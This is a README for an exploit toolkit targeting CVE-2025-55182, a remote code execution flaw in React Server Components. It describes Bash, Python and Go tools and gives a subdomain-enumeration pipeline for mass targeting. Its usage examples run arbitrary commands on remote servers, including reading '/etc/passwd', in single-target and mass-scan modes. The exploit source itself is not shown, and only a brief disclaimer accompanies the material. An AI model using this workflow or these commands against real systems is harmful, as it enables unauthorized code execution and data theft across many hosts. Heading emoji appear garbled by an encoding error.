Share
## https://sploitus.com/exploit?id=485C7034-FDB6-547A-9F13-03C026F10F76
# CVE-2025-55182: React Server Components RCE Scanner

A comprehensive toolkit for detecting and exploiting **CVE-2025-55182**, a Critical Remote Code Execution vulnerability in Next.js applications using React Server Components.

This repository features a unified Bash scanner (Single & Mass mode), Python/Go implementations, and a bug bounty reconnaissance workflow.

![Scanner Menu](./screenshots/menu.png)
![Scanner Demo](./screenshots/exploit.png)

---

## ๐Ÿ“‚ Repository Structure

* **scanner.sh** โ€” All-in-one Bash script for Single Target and Mass Scanning
* **python/exploit.py** โ€” Stable Python implementation (better JSON escaping)
* **go/main.go** โ€” High-performance implementation (compilable)

---

## ๐Ÿš€ Reconnaissance Workflow (Bug Bounty Methodology)

For mass hunting on wildcard domains, use this pipeline to filter targets before scanning:

```bash
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
```

---

## ๐Ÿ› ๏ธ Bash Scanner Usage (Recommended)

The `scanner.sh` script supports **single target scans** and **mass scanning** from a file list.

### ๐Ÿ”ง Installation

```bash
chmod +x scanner.sh
```

---

## 1๏ธโƒฃ Single Target Mode

Best for verifying a specific target with verbose output.

```bash
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
```

---

## 2๏ธโƒฃ Mass Scan Mode

Efficiently scans a list of URLs and saves vulnerable hosts to a file.

```bash
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
```

### Options

| Flag				| Description                                                       				 |
| -----	 		| ----------------------------------------------------------------------	 |
| `-d, --domain` 		| Single target URL                                                 				 |
| `-l, --list`    		| File containing list of URLs                                      				 |
| `-c, --command` 	| Command to execute (default: `id`)                                			 |
| `-o, --output`  		| Output file for vulnerable hosts (default: `vulnerable_hosts.txt`)	 |

---

## ๐Ÿ Python Version

Use this if you encounter issues with Bash escaping special characters.

### Requirements

```bash
pip install requests
```

### Usage

```bash
python3 python/exploit.py -u http://target.com -c "uname -a"
```

---

## ๐Ÿน Go Version

High performance, minimal dependencies.

### Run directly

```bash
go run go/main.go -u http://target.com -c "id"
```

### Build binary

```bash
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
```

---

## โš ๏ธ Disclaimer

This tool is for **educational purposes and authorized security testing only**.
Unauthorized usage is strictly illegal.
The developer assumes **no liability** for misuse or damages caused by this program.

---

## ๐Ÿ”— References

* **NVD CVE Detail:**
  [https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)

* **React Security Advisory (React Server Components vulnerability):**
  [https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)

* **ProjectDiscovery Nuclei Template:**
  [https://cloud.projectdiscovery.io/library/CVE-2025-55182](https://cloud.projectdiscovery.io/library/CVE-2025-55182)